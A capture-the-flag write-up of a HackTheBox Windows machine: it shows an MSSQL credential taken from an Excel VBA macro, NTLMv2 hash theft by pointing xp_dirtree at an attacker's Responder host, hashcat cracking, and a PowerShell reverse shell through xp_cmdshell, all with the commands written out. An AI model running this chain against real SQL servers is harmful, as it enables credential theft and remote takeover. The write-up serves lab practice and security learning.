Box Info
| Platform | HackTheBox |
| Difficulty | Medium |
| OS | Windows |
| Key Techniques | MSSQL Exploitation, VBA Macro Creds, Responder NTLMv2 Steal, xp_cmdshell |
Attack Path Summary
SMB guest access to “Reports” share → downloaded Excel file with VBA macro containing MSSQL credentials (reporting:PcwTWTHRwryjc$c6) → connected to MSSQL with -windows-auth flag → reporting user couldn’t run xp_cmdshell → used Responder + xp_dirtree to steal NTLMv2 hash for the MSSQL service account → cracked hash → reconnected as service account with sysadmin role → enabled xp_cmdshell → reverse shell → privesc.
Enumeration
sudo nmap -Pn -p- --min-rate=1000 -T4 -oN fast_tcp.txt $ip
| Port | Service | Notes |
|---|---|---|
| 445 | SMB | Guest access to Reports share |
| 1433 | MSSQL | The target |
SMB — Excel File with Macro
Found an Excel file in the Reports share. Opened it and checked the VBA macros — found hardcoded MSSQL credentials.
Creds from macro: reporting:PcwTWTHRwryjc$c6
Foothold — MSSQL → Responder → Shell
First Connection
impacket-mssqlclient reporting:'PcwTWTHRwryjc$c6'@$ip -windows-auth
# Connected! But reporting user can't enable xp_cmdshell — not sysadmin
Important: had to use -windows-auth flag. SQL auth vs Windows auth matters. Without this flag the connection fails.
Also: the password has $ in it. Use single quotes in bash or the shell will try to expand it as a variable.
Hash Steal — xp_dirtree + Responder
Since reporting can’t run xp_cmdshell, I used xp_dirtree to make the SQL server connect back to my Responder and steal the NTLMv2 hash of the service account.
# On Kali — start Responder
sudo responder -I tun0
# In MSSQL — trigger connection back to us
xp_dirtree '\\KALI_IP\share'
# Responder catches the NTLMv2 hash for the MSSQL service account
Crack the Hash
hashcat -m 5600 ntlmv2_hash.txt /usr/share/wordlists/rockyou.txt
# Cracked the service account password
Reconnect as Sysadmin → Shell
# Reconnect with the service account (sysadmin privileges)
impacket-mssqlclient svc_account:'password'@$ip -windows-auth
# Enable xp_cmdshell
enable_xp_cmdshell
# Reverse shell
xp_cmdshell 'powershell -e <BASE64_PAYLOAD>'
What I Learned
Always try -windows-auth with impacket-mssqlclient. SQL auth and Windows auth are different. If one fails try the other.
Passwords with $ need single quotes in bash. 'PcwTWTHRwryjc$c6' works, "PcwTWTHRwryjc$c6" doesn’t because bash interprets $c6 as a variable.
VBA macros in Office files are a common credential source on CTF boxes and in real life. Always check SMB shares for Excel/Word files and inspect macros.
xp_dirtree + Responder = steal NTLMv2 hash when xp_cmdshell is denied. The SQL server makes an SMB connection to your machine, and Responder catches the authentication hash. Hashcat mode 5600 for NTLMv2.
Pattern: “MSSQL access but no xp_cmdshell? Use xp_dirtree + Responder to steal the service account hash. Crack it, reconnect with sysadmin rights.”